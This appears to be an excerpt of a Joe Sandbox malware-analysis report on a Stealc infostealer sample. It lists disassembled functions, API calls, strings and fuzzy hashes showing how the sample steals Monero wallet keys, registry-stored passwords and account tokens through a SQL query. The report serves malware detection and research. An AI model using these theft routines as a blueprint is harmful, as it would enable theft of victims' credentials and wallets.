Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 2f4136602168416a3611a0af808ee276db4c8c3d9e32c13b01d336697ff6efcd
Instruction ID: ea5cf898bb50ff9d5d79d7979c9a38176fa63d93b413df99ca6dfc84b07d21ee
Opcode Fuzzy Hash: 2f4136602168416a3611a0af808ee276db4c8c3d9e32c13b01d336697ff6efcd
Instruction Fuzzy Hash: DEE112729102189BCB18FBA0FC57EFD7378AF54700F508128F51657095EF38AA59EBA2

Function 00F11310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F11327

Part of subcall function 00F112A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00F112B4
Part of subcall function 00F112A0: HeapAlloc.KERNEL32(00000000), ref: 00F112BB
Part of subcall function 00F112A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00F112D7
Part of subcall function 00F112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 00F112F5
Part of subcall function 00F112A0: RegCloseKey.ADVAPI32(?), ref: 00F112FF

lstrcatA.KERNEL32(?,00000000), ref: 00F1134F
lstrlenA.KERNEL32(?), ref: 00F1135C
lstrcatA.KERNEL32(?,.keys), ref: 00F11377

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F28B60: GetSystemTime.KERNEL32(?,01774AC0,00F305AE,?,?,?,?,?,?,?,?,?,00F14963,?,00000014), ref: 00F28B86

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F11465

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F199EC
Part of subcall function 00F199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F19A11
Part of subcall function 00F199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F19A31
Part of subcall function 00F199C0: ReadFile.KERNEL32(000000FF,?,00000000,00F202E7,00000000), ref: 00F19A5A
Part of subcall function 00F199C0: LocalFree.KERNEL32(00F202E7), ref: 00F19A90
Part of subcall function 00F199C0: CloseHandle.KERNEL32(000000FF), ref: 00F19A9A

DeleteFileA.KERNEL32(00000000), ref: 00F114EF
memset.MSVCRT ref: 00F11516

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00F11335
wallet_path, xrefs: 00F11330
.keys, xrefs: 00F1136B
\Monero\wallet.keys, xrefs: 00F1138D

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 6104f8fe12c66a3e37c4ce29daa79d8a5160865c2962a0c5b20eeb61d5e2c740
Instruction ID: 5db5b9971976ff487aeac37456c9d8c957dab32bee2051b8572079493a32a78f
Opcode Fuzzy Hash: 6104f8fe12c66a3e37c4ce29daa79d8a5160865c2962a0c5b20eeb61d5e2c740
Instruction Fuzzy Hash: DC5148B1D5012997CB15FB60ED92FED733CAF54300F4041A8B60A62082EF346B95DFA6

Function 00F175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F172D0: memset.MSVCRT ref: 00F17314
Part of subcall function 00F172D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00F17C90), ref: 00F1733A
Part of subcall function 00F172D0: RegEnumValueA.ADVAPI32(00F17C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F173B1
Part of subcall function 00F172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F1740D
Part of subcall function 00F172D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00F17C90,80000001,00F261C4,?,?,?,?,?,00F17C90,?), ref: 00F17452
Part of subcall function 00F172D0: HeapFree.KERNEL32(00000000,?,?,?,?,00F17C90,80000001,00F261C4,?,?,?,?,?,00F17C90,?), ref: 00F17459

lstrcatA.KERNEL32(2DD78020,00F317FC,00F17C90,80000001,00F261C4,?,?,?,?,?,00F17C90,?,?,00F261C4), ref: 00F17606
lstrcatA.KERNEL32(2DD78020,00000000,00000000), ref: 00F17648
lstrcatA.KERNEL32(2DD78020, : ), ref: 00F1765A
lstrcatA.KERNEL32(2DD78020,00000000,00000000,00000000), ref: 00F1768F
lstrcatA.KERNEL32(2DD78020,00F31804), ref: 00F176A0
lstrcatA.KERNEL32(2DD78020,00000000,00000000,00000000), ref: 00F176D3
lstrcatA.KERNEL32(2DD78020,00F31808), ref: 00F176ED
task.LIBCPMTD ref: 00F176FB

Strings

: , xrefs: 00F1764E

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 5fa7659074fb97b4a77fa19caec9515e37f22b8bb1bb204066116759a45dde9d
Instruction ID: 48a50292903b746ec49f79f6cfe1e27550447d0911968d93c7baf257b0648254
Opcode Fuzzy Hash: 5fa7659074fb97b4a77fa19caec9515e37f22b8bb1bb204066116759a45dde9d
Instruction Fuzzy Hash: 77314272940209EFCB18EBB4ED55DFE7B75BF54301F104228F112A7184DA38A986EB61

Function 00F172D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F17314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00F17C90), ref: 00F1733A
RegEnumValueA.ADVAPI32(00F17C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F173B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F1740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00F17C90,80000001,00F261C4,?,?,?,?,?,00F17C90,?), ref: 00F17452
HeapFree.KERNEL32(00000000,?,?,?,?,00F17C90,80000001,00F261C4,?,?,?,?,?,00F17C90,?), ref: 00F17459

Part of subcall function 00F19240: vsprintf_s.MSVCRT ref: 00F1925B

task.LIBCPMTD ref: 00F17555

Strings

Password, xrefs: 00F17401

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 91ef0194051b03a6f28c54226fe91ce33f4f61ecdce2d5da6d38719ecb23db4d
Instruction ID: 5836221579975c3dba1e303b0b35ceb9a2a473e225ee0de6937dd9a445a7120e
Opcode Fuzzy Hash: 91ef0194051b03a6f28c54226fe91ce33f4f61ecdce2d5da6d38719ecb23db4d
Instruction Fuzzy Hash: C26129B5C0426C9BDB24DB50DD51BDAB7B8BF48300F0081E9E649A6141EFB46BC9DFA0

Function 00F27500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F27542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27603
HeapAlloc.KERNEL32(00000000), ref: 00F2760A
wsprintfA.USER32 ref: 00F27640

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Strings

C, xrefs: 00F2754C
:, xrefs: 00F2755C
\, xrefs: 00F27560

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 51087a7fa18a7dd88c0e904cb0a4a34ce0c65b9db038bd423837b808c3d40d06
Instruction ID: 3e6a956ed4a6d3c702545f57cccdf60222d05c2c4688b9836e9d50412325759f
Opcode Fuzzy Hash: 51087a7fa18a7dd88c0e904cb0a4a34ce0c65b9db038bd423837b808c3d40d06
Instruction Fuzzy Hash: 1F41A2B1D04358EBDB10DF94EC55BEEBBB8EF08700F100198F50967280DB78AA84DBA5

Function 00F28100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01780C90,00000000,?,00F30E2C,00000000,?,00000000), ref: 00F28130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,01780C90,00000000,?,00F30E2C,00000000,?,00000000,00000000), ref: 00F28137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F28158
__aulldiv.LIBCMT ref: 00F28172
__aulldiv.LIBCMT ref: 00F28180
wsprintfA.USER32 ref: 00F281AC

Strings

%d MB, xrefs: 00F281A3
@, xrefs: 00F2814D

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 957aeea8247a1d4a7b14302bcd9193a8d08fd8d2c82f734368a4e4d0fbb74e0c
Instruction ID: 6d09ee1b8079d19230dc52444e682311a32a4d87c3ff957272973e31fd8c62d4
Opcode Fuzzy Hash: 957aeea8247a1d4a7b14302bcd9193a8d08fd8d2c82f734368a4e4d0fbb74e0c
Instruction Fuzzy Hash: 4E216DB1E44318ABDB14DFD4DC4AFAEB7B8FB44B10F204219F615BB284C77869018BA5

Function 00F270D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00F270DE

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

OpenProcess.KERNEL32(001FFFFF,00000000,00F2730D,00F305BD), ref: 00F2711C
memset.MSVCRT ref: 00F2716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 00F272BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00F2718C

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 1702fe7c03e775b7c8a2da8e6ceb3ce1468a8ec76f743dccb4d048b80581991d
Instruction ID: 0a4b06185f07ccb06f4410395cd71606b7ecb6f8392e2945657c09a03eca4e3c
Opcode Fuzzy Hash: 1702fe7c03e775b7c8a2da8e6ceb3ce1468a8ec76f743dccb4d048b80581991d
Instruction Fuzzy Hash: 955170B0C04328DBDB24EB90ED55BEDB374AF44300F2040A8E515A61C1EB786E89EF55

Function 00F1BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F19E10: memcmp.MSVCRT(?,v20,00000003), ref: 00F19E2D

lstrlenA.KERNEL32(00000000), ref: 00F1BC9F

Part of subcall function 00F28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 00F1BCCD
lstrlenA.KERNEL32(00000000), ref: 00F1BDA5
lstrlenA.KERNEL32(00000000), ref: 00F1BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00F1BBEB
AccountTokens, xrefs: 00F1BB49
AccountTokens, xrefs: 00F1BABA
AccountId, xrefs: 00F1BCC4

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
